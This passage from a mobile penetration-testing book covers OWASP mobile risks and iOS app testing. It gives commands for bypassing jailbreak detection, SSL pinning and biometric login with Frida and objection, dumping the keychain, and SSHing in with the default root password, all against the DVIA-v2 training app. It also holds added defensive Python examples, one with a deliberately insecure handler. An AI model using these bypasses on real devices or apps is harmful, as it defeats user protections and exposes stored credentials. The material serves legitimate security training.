information: 

• It is possible that the fundamental encryption and decryption algorithm is insecure, or 

• There are implementation problems with the cryptography process itself. 
Mobile apps with broken cryptography may be the consequence of a number of different things. 
The following are some of these possible causes: 

• bypassing the encryption techniques incorporated within the code, 

• managing your digital keys improperly, and 

• using non-standard or outdated encryption techniques. 


Remediation measures for this vulnerability: 


Inadequate cryptographic safeguards may enable unauthorized access to sensitive data (such as 
the user’s personal information) stored on the device. 


• Use the National Institute of Standards and Technology’s (NIST) recommended strong 
cryptographic standards. 


• When possible, avoid storing any sensitive information on the device. 


Insecure authorization 


Users are not all created equally! Although some users only need the basic permissions and 
capabilities, others, like admin users, may need more. Poor authorization protocols do not check 
the user’s identity or authority to access the requested resources. Hackers are able to log in as 
authorized users and conduct privilege escalation attacks because identification policies and the 
rights granted to users are not effectively enforced. 


Remediation measures for this vulnerability: 


Similar to insecure authentication, unsecured authorization has negative effects. Both of them 
carry the risk of data loss, harm to one’s reputation, and potential noncompliance fines and 
penalties. 


• Make sure that the backend processes for each request check to see if the incoming 
identifiers linked to an identity match and genuinely belong to the identity. 


• Use data from backend systems to validate a user’s roles and permissions rather than 
relying just on data from the user’s mobile device. 
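The authorization check described in these two points, together with the server-side authentication the previous section asked for, as an added example that is not from the book; the users, accounts, passwords, tables and handler names are constructed for illustration:

```python
"""Added example, not from the book: a minimal backend request handler that
contrasts the insecure authentication and insecure authorization patterns the
OWASP list describes with their remediation. Standard library only."""
import hashlib
import hmac
import secrets
from typing import Optional


def hash_password(password: str, salt: bytes) -> bytes:
    # Slow, salted hash kept server side; the mobile client never stores the password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


# Constructed backend tables. Roles and account ownership live here, never in the request.
_SALTS = {name: secrets.token_bytes(16) for name in ("alice", "bob", "carol")}
USERS = {
    "alice": {"role": "user",  "pw": hash_password("correct-horse", _SALTS["alice"])},
    "bob":   {"role": "user",  "pw": hash_password("battery-staple", _SALTS["bob"])},
    "carol": {"role": "admin", "pw": hash_password("ops-only-please", _SALTS["carol"])},
}
ACCOUNTS = {101: {"owner": "alice", "balance": 50}, 202: {"owner": "bob", "balance": 75}}
SESSIONS = {}   # session token -> username, issued only by login()


def login(username: str, password: str) -> Optional[str]:
    """Server-side authentication: verify the salted hash in constant time and
    issue an unguessable session token. Returns None on failure."""
    user = USERS.get(username)
    if user is None:
        return None
    if not hmac.compare_digest(user["pw"], hash_password(password, _SALTS[username])):
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = username
    return token


def get_balance_insecure(request: dict) -> dict:
    """The flaw: identity and role are read from fields the mobile client sent,
    so any client can claim to be another user or to hold the admin role."""
    account = ACCOUNTS.get(request["account_id"])
    if account is None:
        return {"status": 404}
    if request.get("role") == "admin" or account["owner"] == request.get("user"):
        return {"status": 200, "balance": account["balance"]}
    return {"status": 403}


def get_balance_secure(request: dict) -> dict:
    """Remediation: resolve the caller from the server-issued session token, take
    the role from the backend table, and check that the requested account id
    really belongs to that identity (or that the caller is an admin)."""
    username = SESSIONS.get(request.get("token", ""))
    if username is None:
        return {"status": 401}
    account = ACCOUNTS.get(request["account_id"])
    if account is None:
        return {"status": 404}
    role = USERS[username]["role"]
    if role == "admin" or account["owner"] == username:
        return {"status": 200, "balance": account["balance"]}
    return {"status": 403}


if __name__ == "__main__":
    token = login("alice", "correct-horse")
    # A client that lies about who it is: alice asking for bob's account as "admin".
    forged = {"token": token, "account_id": 202, "user": "bob", "role": "admin"}
    print("insecure handler:", get_balance_insecure(forged))   # leaks bob's balance
    print("secure handler:  ", get_balance_secure(forged))     # 403
```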


Client code quality 


This section of the OWASP mobile security threats list is sort of a catch-all for problems with 
mobile clients caused by bad code implementations. 


An attacker may send specially created inputs to function calls made within an app in an effort to 
run them or track the activity of the program. It might result in decreased speed, more memory 
consumption, and so on. Because they occur on the mobile client and are distinct from coding 
errors that occur on the server, the coding errors must be corrected locally. Mobile apps may 
contain errors at the code level that might result in problems like: 

• Format-string vulnerabilities. 

• Buffer overflows. 

• Integration with insecure third-party libraries. 

• Remote code execution. 
Many apps rely on third-party libraries, which frequently have problems and are not thoroughly 
tested, to create their applications. Since the developers do not own the code, these problems are 
beyond their control. Rewriting portions of the code now being executed on the device is the 
most common solution for code-level issues. What else can you do, though? 


Remediation measures for this vulnerability: 


Remote code execution and other vulnerabilities and problems that we have already highlighted 
can result from poor code quality issues. Fortunately, there are a few things you may do to lessen 
these problems: 


• Use automated tools to check for memory leaks, buffer overflows, and other issues. Rely 
on source code reviews. Write clear, well-documented code. 


• Use consistent coding patterns across the organization. 


Code tampering 


Modified versions of mobile apps can occasionally be found in app stores. A modified program 
is one where a hacker changes the binary to add harmful code, set up a backdoor, and so on. 
Attackers have the ability to re-sign these fake apps and upload the updated version to other app 
stores. To mislead a victim into downloading the software, they can also deliver it to the victim 
directly via a phishing attack. 


Remediation measures for this vulnerability: 
Modifying the code can result in financial losses, identity theft, reputational harm, and other 
problems. 


• If more code has been added or modified, the app must be able to recognize any code 
integrity violations and respond appropriately to them when they occur. Users may be 
informed about code changes by using a tool like a code signing certificate. 


• Utilize anti-tamper techniques to disable the execution of unauthorized apps by using 
checksums, digital signatures, code hardening, and other validation approaches. 


Reverse engineering 


Attackers might decompile and reverse engineer the app to analyze its source code. This is 
especially risky as the attacker may comprehend, examine, and edit the code to introduce 
destructive functionality or transmit unwanted adverts. They can edit the software using tools 
like IDA Pro, Hopper, and other binary inspection tools once they have a basic understanding of 
how it functions. They can recompile and launch the software once they have got it to behave as 
they want. 


Remediation measures for this vulnerability: 


To prevent reverse engineering, the code should be obfuscated so that an attacker cannot 
de-obfuscate it using tools like IDA Pro and Hopper. 


Extraneous functionality 


Mobile app developers occasionally mistakenly include features or backdoors that are hidden 
from consumers via the user interface. These items might be put into use in a production setting 
with a feature that was not meant to be there, posing a security risk. 


Hackers can often take advantage of these flaws in their systems without the assistance of regular 
users. They may look through configuration files, analyze the binaries, and other things to find 
features of the backend system that hackers can use to launch an attack. 


Remediation measures for this vulnerability: 
Manual secure code review is one of the best approaches to stop these kinds of mobile app 
vulnerabilities. This makes it possible for you to: 

• Check the configuration settings of the mobile app to look for any concealed switches. 


• Make sure the logs do not contain assertions about the backend systems that are overly 
informative. 


Conclusion 


After reading this chapter, the reader will understand Android Architecture, and will learn how to 
set up Android Penetration Testing Environment and know the popular Android Penetration 
Testing Tools. Finally, the reader can learn how to protect their Android Applications, based on 
OWASP TOP 10. In the upcoming chapter, we will learn about iOS penetration testing as 
another popular mobile operating system. 


Questions 


1. Mention four native libraries that are found in Android architecture. 

2. Mention two native applications that are found in Android architecture. 
3. Mention three popular Android penetration testing tools. 

4. Mention four of OWASP’s Top 10 vulnerabilities for Android. 


CHAPTER 11 
iOS Penetration Testing 


Introduction 


The mobile application’s penetration testing involves Android and iOS, two key market players. 
Both operating systems are widely used and come with unique features. 


In this chapter, we will examine the iOS platform and how to begin penetration testing on an iOS 
application. We will begin by going over the fundamentals of the iOS application and some key 
information, then go on to the necessary tools, lab setup, and some simple attacks. 


Evaluating the API requests coming from an iOS application is similar to standard API 
penetration testing procedures. The primary distinctions lie in static and dynamic functional 
analysis, circumventing established limitations, manipulating functions, and other intriguing 
areas. 


Structure 


The following topics will be covered in this chapter: 


• Basics of iOS application 

• iOS application Sandbox structure 
• Vulnerable application 

• Testing methodology 

• OWASP mobile top 10 


Objectives 


In this chapter, you will be able to understand the basics of iOS applications, then learn iOS 
application sandboxing structure and know the popular iOS penetration testing tools. Finally, you 
will learn the testing methodology of the iOS application. 


Basics of iOS application 


Understanding the iOS platform, its built-in security features, and other key terms is crucial 
before starting with iOS application penetration testing. Now, we will go over some key phrases 
in the simplest, quickest way we can, then suggest additional reading to fully examine them. 


Architecture of iOS 


The iOS system’s basic architecture is shown in Figure 11.1, where multiple layers are used to 
create communication and carry out various functions between the application and hardware 
levels: 


Figure 11.1 shows the layers from top to bottom: Cocoa Touch (Application) with AppKit; 
Media with AV Foundation, Core Animation, Core Audio, Core Image, Core Text, OpenAL, 
OpenGL, and Quartz; Core Services with Address Book, Core Foundation, Quick Look, Social, 
Security, and WebKit; and Core OS with Accelerate, Directory Services, Disk Arbitration, 
OpenCL, and System Configuration. 


Figure 11.1: iOS architecture 


Let us briefly go through a few of these layers: 


• Core OS: Numerous low-level functionalities are provided by the Core OS layer, upon 
which various services are constructed. These include Accelerate Framework, Directory 
Services, System Configuration, OpenCL, and so on. 


• Core services: Over the services offered in the Core OS layer, the core services layer 
offers an abstraction. These services generally include Address Book, Social, Security, 
WebKit, and so on. 


• Media: The device can use a variety of media services provided by the media layer, which 
essentially makes all audio-visual technologies possible. It provides various functions 
such as Core Image, Core Audio, Core Text, and so on. 


• Cocoa touch (application): The application layer is another name for the cocoa touch 
layer. It is the top layer in the architecture and exposes several APIs for creating iPhone- 
compatible software. 


The file extension for iOS applications is .ipa. 


File structure of an IPA 


To begin, we must rename the IPA file to have the .zip extension so that we may unzip it and 
analyze its structure. The contents are as follows when we unzip it: 


• App binary: The executable file containing the compiled (unreadable) application source 
code. 


• Info.plist: The Info.plist file uses a list of different characteristics to describe the 
application to the operating system. When conducting security assessments, we frequently 
scan this file because it might provide valuable information or point out some 
configuration errors. 

• Frameworks: List of dynamic libraries. 

• embedded.mobileprovision: This contains the certificates. 

• Keychain: An application can keep sensitive information in a keychain that is encrypted 
and can only be accessed by other applications with permission. View more: 
https://developer.apple.com/documentation/security/keychainservices. 


Refer to Figure 11.2: 


Figure 11.2: IPA file structure 


iOS application Sandbox structure 


So, how do applications work once they are installed on iOS? Because of Apple’s sandboxing, 
applications can create local databases on the aforementioned device. They are kept apart from 
other apps because of this. Because there will be a lot of programs storing data on the device’s 
hard drive, iOS gives each app its own sandbox to avoid conflicts. Refer to Figure 11.3: 
Figure 11.3: Sandboxing in iOS 


The iOS device has three different types of sandboxes as follows: 


• Pre-installed App directory — /var/Application 


The app files for the applications that are pre-installed by default on the iOS device are 
kept in this directory. Refer to Figure 11.4: 


Figure 11.4: Pre-installed applications 


• Bundle directory — /var/containers/Bundle/Application 
The Bundle directory, often referred to as the IPA Container, houses all of the files that are 
downloaded with apps from the Apple App Store, as well as apps downloaded from other 
sources. This directory’s contents will not change as an application version changes. Refer 
to Figure 11.5: 


Figure 11.5: Bundle directory applications 


• Data directory — /var/mobile/Containers/data/Application 


The developer stores the files they want to keep in the Data directory, also called the 
Local Data Storage Container. These are items related to the application once it is 
installed on the device: files that could serve as a cache for information to be accessed 
quickly, or as a backup of offline data to be used when the application is reopened. Refer 
to Figure 11.6: 


Figure 11.6: Data directory applications 


Jailbreak 


The process of removing the company-imposed user limitations on your device is known as 
“jailbreaking.” It is crucial to be aware that Jailbreak violates your device’s warranty. Different 
jailbreaking techniques exist for iOS, depending on the version. A useful website for suggesting 
jailbreak tools depending on the iOS application is https://canijailbreak.com. It is important to 
note that jailbreaking can be carried out on Windows, Mac, or Linux systems. Additionally, there 
are other categories of jailbreaking, which are described as follows: 


• Untethered Jailbreak: Permanent Jailbreak; the device will remain jailbroken even after a 
reboot. 


• Tethered Jailbreak: Temporary Jailbreak; after a reboot, the device will be back to its 
normal state. 


• Semi-tethered Jailbreak: The device can boot up independently after a semi-tethered 
jailbreak, but it will no longer have a patched kernel and will not be able to execute 
modified code. 


• Semi-untethered Jailbreak: A semi-untethered jailbreak is similar to an untethered 
jailbreak in that it enables the device to start up on its own. Each time the device starts, the 
startup procedure remains the same, and it enters its default, non-jailbroken state. 
However, the user can re-jailbreak their phone using an app that runs on the device 
rather than a computer, as in a tethered or semi-tethered situation. 


The jailbreak procedure is straightforward and takes 2 to 5 minutes. The following tools can be 
used to jailbreak specific iOS versions. Refer to Figure 11.7: 
Figure 11.7: Jailbreak tools 


Zeon is a jailbreak tool for iOS version 15 and higher. You can download it from 
https://zeon-app.com/ to set up the environment. 


The tools, scripts, and applications needed to begin learning iOS applications will be covered in 
this part. Please be aware that there are numerous tools and scripts available. This article may not 
cover all of them; thus, it is advised that you investigate each one independently. 


Be aware that it is advised to test iOS applications on a physical device. I use a variety of 
iPhone 7 and iPhone 12 mini devices. Additionally, make sure that auto-updates are off to 
prevent acquiring the most recent version while you wait for a jailbreak. 


A virtual device can be obtained by visiting https://www.corellium.com/. 


Vulnerable application 


Use the following vulnerable applications and install them in the designated repositories by 
following the instructions provided: 


• DVIA-v2: https://github.com/prateek147/DVIA-v2i 
• iGoat: https://github.com/OWASP/igoat 

We will be using the DVIA-v2 application. 


Testing methodology 


When doing a penetration test on an iOS application, several elements are involved. One 
component is static analysis using manual methods and tools like MobSF. Another element 
involves runtime exploitation, which entails hooking various methods and objects to get around 
obstacles and obtain sensitive data. The last element is testing the dynamic API calls that the 
application generates, such as login API requests. 


We will first extract the IPA from the iOS application and run a static analysis on it using 
MobSF. Then, we will examine a number of bypassing techniques, such as the Jailbreak 
Detection Bypass, SSL Pinning Bypass, Local Authentication Bypass, and so on. 


Extracting the IPA 


There are many ways to extract the IPA file; however, for the purposes of this section, we will 
use SSH. 


The steps to extract the IPA are as follows: 


1. Open an SSH connection to your iPhone: ssh root@ip (the default password is alpine). 
2. Go to the directory listed here: /var/containers/Bundle/Application 
3. Now look for the application: find | grep "app_name" 
4. Go to the folder where your app is located: cd <app_directory> 
5. Make a directory called Payload: mkdir Payload 
6. Copy the app bundle into the Payload directory: cp -r <appname.app>/ Payload/ 
7. Zip the Payload directory into an IPA: zip -r /var/root/<appname>.ipa Payload/ 


Running static analysis with MobSF 


MobSF static analysis comes after the extraction of the IPA file. Although you can install MobSF 
directly or use any other available installation method, we will be using the MobSF Docker 
option. 

• MobSF: https://github.com/MobSF/Mobile-Security-Framework-MobSF 

• MobSF Documentation: https://mobsf.github.io/docs/#/ 


To perform the static analysis, follow the given steps: 


1. Run the MobSF Web interface. 
2. Drop the IPA file and run the static analysis. 
3. Once the static analysis is complete, search for configuration errors, such as: 
   a. Insecure URL schemes, as shown in Figure 11.8: 
   Figure 11.8: Insecure URL schemes 
   b. Insecure permissions and ATS misconfiguration, as shown in Figure 11.9: 
   Figure 11.9: Insecure permissions 
   c. Insecure binary options, as shown in Figure 11.10: 
   Figure 11.10: Insecure binary options 
   d. Firebase database, hardcoded information, and e-mails, as shown in Figure 11.11: 
   Figure 11.11: Firebase database, e-mails, and hardcoded information 
   e. Other interesting files such as Assets, Resources, Debug Info, and Native and 
   Non-Native Libs. 
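The URL scheme and ATS findings in steps 3a and 3b come from the app's Info.plist. As an added example (not MobSF's own code), this Python checker reads an Info.plist and reports the same three classes of issue: registered custom URL schemes, App Transport Security exceptions that allow cleartext HTTP or old TLS, and the usage-description keys that reveal which permissions the app requests. The plist it parses is constructed inline; the bundle identifier, scheme and domain in it are made up.

```python
"""Check an iOS Info.plist for the configuration issues MobSF flags.

Added example, not MobSF's own code. It reports three things from a
bundle's Info.plist: custom URL schemes the app registers (each one is an
entry point other apps can invoke), App Transport Security (ATS) settings
that permit cleartext HTTP or old TLS, and the NS*UsageDescription keys
that show which sensitive permissions the app requests.
"""
import plistlib

WEAK_TLS = ("TLSv1.0", "TLSv1.1")


def check_info_plist(plist_bytes):
    """Return a list of (category, message) findings for a binary or XML plist."""
    info = plistlib.loads(plist_bytes)
    findings = []

    for url_type in info.get("CFBundleURLTypes", []):
        for scheme in url_type.get("CFBundleURLSchemes", []):
            findings.append(("url-scheme",
                             "app registers custom URL scheme %s:// (validate its input)" % scheme))

    ats = info.get("NSAppTransportSecurity", {})
    if ats.get("NSAllowsArbitraryLoads"):
        findings.append(("ats", "NSAllowsArbitraryLoads is true: cleartext HTTP allowed to any host"))
    if ats.get("NSAllowsArbitraryLoadsInWebContent"):
        findings.append(("ats", "NSAllowsArbitraryLoadsInWebContent is true: web views may load cleartext HTTP"))
    for domain, rules in ats.get("NSExceptionDomains", {}).items():
        if rules.get("NSExceptionAllowsInsecureHTTPLoads"):
            findings.append(("ats", "cleartext HTTP explicitly allowed for %s" % domain))
        tls = rules.get("NSExceptionMinimumTLSVersion")
        if tls in WEAK_TLS:
            findings.append(("ats", "%s accepts %s" % (domain, tls)))

    for key in sorted(info):
        if key.startswith("NS") and key.endswith("UsageDescription"):
            findings.append(("permission", "%s: %r" % (key, info[key])))
    return findings


def count_by_category(findings):
    """Summarise findings as {category: count}."""
    counts = {}
    for category, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


# Constructed Info.plist (not DVIA-v2's real one); identifier, scheme and domain are made up.
SAMPLE_INFO_PLIST = plistlib.dumps({
    "CFBundleIdentifier": "com.example.demoapp",
    "CFBundleURLTypes": [{"CFBundleURLSchemes": ["demoapp"]}],
    "NSAppTransportSecurity": {
        "NSAllowsArbitraryLoads": True,
        "NSExceptionDomains": {
            "legacy.example.com": {
                "NSExceptionAllowsInsecureHTTPLoads": True,
                "NSExceptionMinimumTLSVersion": "TLSv1.0",
            }
        },
    },
    "NSCameraUsageDescription": "Used to scan QR codes",
})

# A plist with no URL types, no ATS exceptions and no permission keys yields no findings.
CLEAN_INFO_PLIST = plistlib.dumps({"CFBundleIdentifier": "com.example.clean"})


if __name__ == "__main__":
    for category, message in check_info_plist(SAMPLE_INFO_PLIST):
        print("[%s] %s" % (category, message))
```

Run against a real bundle by passing the bytes of Payload/<name>.app/Info.plist; plistlib handles both the binary and the XML form, so no conversion with plutil is needed first.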


Setting up proxy 


Burp Suite's proxy configuration is rather easy to understand and implement. Follow the given 
steps: 


1. In the Wi-Fi settings, enable manual proxy and enter the proxy information, as shown in 
Figure 11.12: 
Figure 11.12: Wi-Fi setting 


2. Go to Proxy Settings in Burp Suite and change the listener to All Interfaces, as shown in 
Figure 11.13: 
Figure 11.13: Proxy settings 


3. Now, on the iPhone, open http://burp and download the CA certificate. 
4. Install the CA certificate. 


5. Now, navigate to Settings | General | About | Certificate Trust Settings and enable the 
PortSwigger CA certificate, as shown in Figure 11.14: 
Figure 11.14: Proxy certificate 


Bypassing Jailbreak detection 


For this demonstration, we will consider a variety of choices for bypassing jailbreak detection 
using the Frida and Objection tools. Keep in mind that the status of the device is Jailbroken, as 
shown in Figure 11.15: 


[Screenshot: the DVIA-v2 Jailbreak Detection screen reporting "Device is Jailbroken"] 


Figure 11.15: Device is Jailbroken 


Using Frida 


1. Run the following command on your system: frida --codeshare rodnt/ios-jailbreak-bypass 
-f DVIA-v2 


2. Go back to the application and select Jailbreak 1, then note that the jailbreak detection 
has been bypassed, as shown in Figure 11.16: 
Figure 11.16: Device is not Jailbroken using Frida 


Using objection 


1. Run the following commands on your system, as shown in Figure 11.17: 
objection -g DVIA-v2 explore 
ios jailbreak disable 


Figure 11.17: Objection commands 


2. Go back to the application and select Jailbreak 1, then note that the jailbreak detection 
has been bypassed, as shown in Figure 11.18: 
Figure 11.18: Device is not Jailbroken using objection 


The following list includes a variety of tools that can be used to avoid jailbreak detection: 


• Liberty Lite: https://yalujailbreak.net/liberty-lite/ 
• A-Bypass: https://repo.co.kr/package/com.rpgfarm.a-bypass 


Bypassing SSL pinning 


Let us now see how we can bypass the SSL Pinning using various methods. 


Using Objection 


1. Run the following commands on your system, as shown in Figure 11.19: 
objection -g DVIA-v2 explore 
ios sslpinning disable 


Figure 11.19: SSL pinning disable using objection 


2. Next, go to the application and select Send Using Certificate Pinning under Network 
Layer Security. 


3. Note that the data can now be intercepted because SSL pinning has been bypassed. Refer to 
Figure 11.20: 
Figure 11.20: Proxy settings 


The following list includes a variety of tools that can be used to bypass SSL pinning: 


• Frida: https://codeshare.frida.re/ 
• SSLKillSwitch2: https://github.com/nabla-c0d3/ssl-kill-switch2 


Bypassing biometric (local) authentication 


Let us now see how we can bypass biometric (local) authentication using various methods. 


Using objection 


1. Run the following commands on your system, as shown in Figure 11.21: 
objection -g DVIA-v2 explore 
ios ui biometrics_bypass 
exit 


Figure 11.21: Bypassing biometric using objection 


2. Next, open the app and select Touch/Face ID Bypass | Start Challenge | Swift 
Implementation, as shown in Figure 11.22: 
Figure 11.22: Face not recognized 


3. When the application prompts you with Face Not Recognized, select Cancel to avoid 
authentication, as shown in Figure 11.23: 
Figure 11.23: Authentication successful 


Checking for sensitive data exposure in local storage 


The sensitive data is kept in local storage in a number of different locations. The different 
locations where you can locate sensitive data and how to launch an attack are listed as follows. 


Open the DVIA-v2 application, then select Local Data Storage. Save some data using each of 
the available choices. 


Sensitive data in Plist 


Case 1: Store sensitive data in Plist 
Follow the given steps: 


1. Run the following commands: 
objection -g DVIA-v2 explore 
env 
cd /var/mobile/Containers/Data/Application/<app-id>/Documents 
ios plist cat userInfo.plist 


2. Note that the sensitive data is stored as plain text, as shown in Figure 11.24: 


Figure 11.24: ios plist cat userInfo.plist command 


Sensitive data in UserDefaults 


Case 2: Store sensitive data in UserDefaults 
Follow the given steps: 


1. Run the following commands: 
objection -g DVIA-v2 explore 
ios nsuserdefaults get 


2. You can see that the sensitive data is contained in the DemoValue parameter as plain text, 
as shown in Figure 11.25: 


Figure 11.25: ios "nsuserdefaults get" command 


Sensitive data in keychain 


Case 3: Store sensitive data in keychain 
Follow the given steps: 


1. Run the following commands: 
objection -g DVIA-v2 explore 
ios keychain dump 


2. Take note that the password (Super Secure Password) is saved in the keychain as plain 
text, as shown in Figure 11.26: 


Figure 11.26: ios keychain dump command 


For the remaining attacks, we will employ the Grapefruit tool 
(https://github.com/ChiChou/grapefruit). Install it, start it, and connect your iPhone to the 
application. 


Sensitive data in core data 


Case 4: Store sensitive data in core data 
Follow the given steps: 


1. Open Grapefruit and load the DVIA-v2 application. Go to the following: Data | Library | 
Application Support. 
2. Open Model.sqlite. 
3. Note that the private data is readable. Refer to Figure 11.27: 
Figure 11.27: Sensitive data in core data 


Sensitive data in couchbase lite 


Case 5: Store sensitive data in couchbase lite 
Follow the given steps: 


1. Load the DVIA-v2 application with Grapefruit and navigate to the following: Data | 
Library | Application Support | CouchbaseLite | dvcouchbasedb.cblite2. 
2. Download db.sqlite3, open it, and you will be able to see the sensitive information. 


Sensitive data in YapDatabase 


Case 6: Store sensitive data in YapDatabase 
Follow the given steps: 


1. Load the DVIA-v2 application with Grapefruit and navigate to the following: Data | 
Library | Application Support. 
2. Download YapDatabase.sqlite and open it with SQLite Viewer. 
3. You will be able to access the sensitive data. 
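Cases 1 to 6 all come down to the same check: pull the app's data container and look inside its plists and SQLite files for values stored in the clear. As an added example (not part of the book, DVIA-v2, objection or Grapefruit), this Python script automates that triage over a copied container directory: it walks the tree, reads every .plist with plistlib and every .sqlite/.sqlite3/.db file with the sqlite3 module, and reports any key or column whose name suggests a credential together with the plaintext value found there. The container it scans is constructed inline using the file names from the cases above (userInfo.plist, Model.sqlite); the stored values and the name pattern it matches on are assumptions.

```python
"""Triage an iOS app data container for secrets stored in the clear.

Added example; not part of the book, DVIA-v2, objection or Grapefruit.
Cases 1 to 6 above all amount to the same check: copy the app's data
container off the device, then open its plists and SQLite databases
(Core Data's Model.sqlite, YapDatabase.sqlite, Couchbase Lite's db.sqlite3)
and look for values kept in plain text. This script walks a copied
container and reports every plist key or table column whose name suggests
a credential, together with the plaintext value found there.
"""
import os
import plistlib
import re
import sqlite3
import tempfile

# Key/column names that usually hold credentials (an assumed, extendable list).
SENSITIVE_NAME = re.compile(r"(pass(word)?|secret|token|api[_-]?key|credit|card)", re.I)


def scan_plist(path):
    """Return (file, key path, value) for string values under sensitive-looking keys."""
    with open(path, "rb") as fh:
        data = plistlib.load(fh)
    findings = []

    def walk(node, key_path):
        if isinstance(node, dict):
            for key, value in node.items():
                walk(value, key_path + "/" + str(key))
        elif isinstance(node, list):
            for index, value in enumerate(node):
                walk(value, "%s[%d]" % (key_path, index))
        elif isinstance(node, str) and SENSITIVE_NAME.search(key_path):
            findings.append((os.path.basename(path), key_path, node))

    walk(data, "")
    return findings


def scan_sqlite(path):
    """Return (file, table.column, value) for rows in sensitive-looking columns."""
    findings = []
    conn = sqlite3.connect(path)
    try:
        tables = [row[0] for row in
                  conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
        for table in tables:
            # PRAGMA table_info returns (cid, name, type, notnull, dflt_value, pk).
            columns = [row[1] for row in conn.execute('PRAGMA table_info("%s")' % table)]
            for column in columns:
                if not SENSITIVE_NAME.search(column):
                    continue
                for (value,) in conn.execute('SELECT "%s" FROM "%s"' % (column, table)):
                    if value is not None:
                        findings.append((os.path.basename(path),
                                         "%s.%s" % (table, column), str(value)))
    finally:
        conn.close()
    return findings


def scan_container(root):
    """Walk a copied data container and scan every plist and SQLite file in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            if name.endswith(".plist"):
                findings.extend(scan_plist(path))
            elif name.endswith((".sqlite", ".sqlite3", ".db")):
                findings.extend(scan_sqlite(path))
    return findings


def build_sample_container():
    """Constructed container mimicking the Documents/ and Library/Application Support/
    layout used in the cases above; the stored values are made up."""
    root = tempfile.mkdtemp(prefix="ios-container-")
    documents = os.path.join(root, "Documents")
    os.makedirs(documents)
    with open(os.path.join(documents, "userInfo.plist"), "wb") as fh:
        plistlib.dump({"username": "alice", "password": "Super Secure Password"}, fh)

    app_support = os.path.join(root, "Library", "Application Support")
    os.makedirs(app_support)
    conn = sqlite3.connect(os.path.join(app_support, "Model.sqlite"))
    # Core Data prefixes its table and column names with Z.
    conn.execute("CREATE TABLE ZUSER (Z_PK INTEGER PRIMARY KEY, ZUSERNAME TEXT, ZPASSWORD TEXT)")
    conn.execute("INSERT INTO ZUSER VALUES (1, 'alice', 'coredata-secret')")
    conn.commit()
    conn.close()
    return root


if __name__ == "__main__":
    for file_name, location, value in scan_container(build_sample_container()):
        print("%s: %s = %r" % (file_name, location, value))
```

The name-based match is deliberately broad so that Core Data's Z-prefixed columns and arbitrary plist keys are both caught; on a real container it is a starting list to review by hand, and any hit belongs in the keychain (or encrypted at rest) rather than in a plist or an SQLite column.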


OWASP mobile top 10 


The OWASP mobile top 10 is a ranking of the security threats that mobile applications face, 
compiled from research and user feedback. 


M1: Improper platform usage 


The first OWASP mobile top 10 category focuses on the areas where an attacker may abuse the 
security features offered by the iOS platform. Additionally, several security vulnerabilities may 
occasionally develop as a result of improper platform feature implementation. 


Under this area, a number of components, including Biometric Authentication, Keychain, 
Platform Permission, and so on, must be examined. 


M2: Insecure data storage 


Many times, iOS applications save certain data locally in various parts. If an attacker gains 
access to the user’s physical device, there is a potential that sensitive data will be saved locally 
and could be used against the user. 


Here are a few examples of the general dangers that fall into this category: 


• Sensitive data stored in Plist 
• Sensitive data stored in UserDefaults 
• Sensitive data stored in Keychain 
• Sensitive data stored in core data 
• Sensitive data stored in Webkit Caching 
• Sensitive data stored in Realm 
• Sensitive data stored in Couchbase Lite 
• Sensitive data stored in YapDatabase 
• URL caching (both request and response) 
• Keyboard press caching 
• Copy/paste buffer caching 
• Insecure logging 
• Background screen caching 
• Analytics data sent to third parties 


M3: Insecure communication 


iOS applications communicate using a client-server architecture. Owing to faulty or inadequate 
implementation of communication standards, such as communication over HTTP, an attacker can 
try to steal critical information over unencrypted channels, perform Man-in-the-Middle attacks, 
or study the requests and responses by capturing them with proxy tools like Burp Suite. 


Here are a few examples of the general dangers that fall into this category: 


• Lack of, or bypassable, SSL pinning 
• Communication over HTTP (unencrypted communication) 
• Plain-text submission of sensitive information 
• Logging sensitive information in the logs 


M4: Insecure authentication 


Applications are typically categorized as having insecure authentication when they either 
improperly handle authentication checks or permit attackers to modify login/authentication 
requests in order to access the target user’s account. 


Here are a few examples of the general dangers that fall into this category: 


• Guessable/weak/default credentials 
• Authentication bypass using attacks such as injection attacks 


M5: Insufficient cryptography 


The user data is frequently stored by iOS applications or used in various client-server queries. An 
attacker may try to access data that is encrypted using a weak cryptographic approach due to a 
lack of strong cryptography and obtain sensitive data in this way. 


Here are a few examples of the general dangers that fall into this category: 


• Stealing app and user data 
• Accessing encrypted files 
• Accessing encrypted client-server request endpoints 


M6: Insecure authorization 


Insecure authorization and insecure authentication are two checks that are frequently confused. 
This category covers attacks that go beyond the user's own level of privilege and access by taking 
advantage of poorly implemented user authorization checks. 


Here are a few examples of the general dangers that fall into this category: 


• IDOR 
• Privilege escalation 
• Direct request 


M7: Client code quality 


Because of the frequently poor code quality, an attacker may try to send the carefully constructed 
inputs to function calls made within an app in an effort to execute them or watch the behavior of 
the program. It might cause some application malfunctions and exploitable situations. 


Here are a few examples of the general dangers that fall into this category: 


• Format string vulnerabilities 
• Buffer overflows 
• Remote code execution 
• Memory exhaustion 


M8: Code tampering 


An attacker may try to modify the application code and inject malicious code, such as a 
backdoor, and distribute it using the App Store and other methods, which could result in the theft 
of sensitive information and compromise of the user’s device as well if the application does not 
implement the code tampering checks. 


Here are a few examples of the general dangers that fall into this category: 


• Malware injection 
• Stealing sensitive data 
• Persistent backdoor 


M9: Reverse engineering 


The reverse engineering approach entails studying the binaries and their code using tools like 
Hopper, otool, and IDA Pro, in order to comprehend the application's code patterns and various 
function implementations, and to carry out bypasses and attacks using runtime and dynamic 
instrumentation methodologies. 


One of the typical instances is to examine how SSL Pinning logic is implemented, comprehend 
the functions responsible for pinning checks, and then use tools like Frida to go around it by 
creating a custom logic script. 


M10: Extraneous functionality 


Typically, the development team stores code before sending an application to production to 
allow for simple access to the backend server, to provide logs for error analysis, or to store 
staging and testing information. This code is not necessary for the app to operate. In essence, it is 
only necessary during the development phase and has no use for the intended usage once the app 
is in production. 


In some circumstances, this code may contain data about databases, user information, user rights, 
API endpoints, and so on, or it may disable features like two-factor authentication. 


Conclusion 


This chapter discussed the principles of iOS penetration testing as well as various methods for 
jailbreak detection bypass, biometrics bypass, SSL pinning bypass, and finding sensitive data 
exposure in local storage. 


Questions 


1. How do you bypass SSL pinning? 
2. How do you bypass jailbreak detection? 
3. How do you bypass biometrics? 
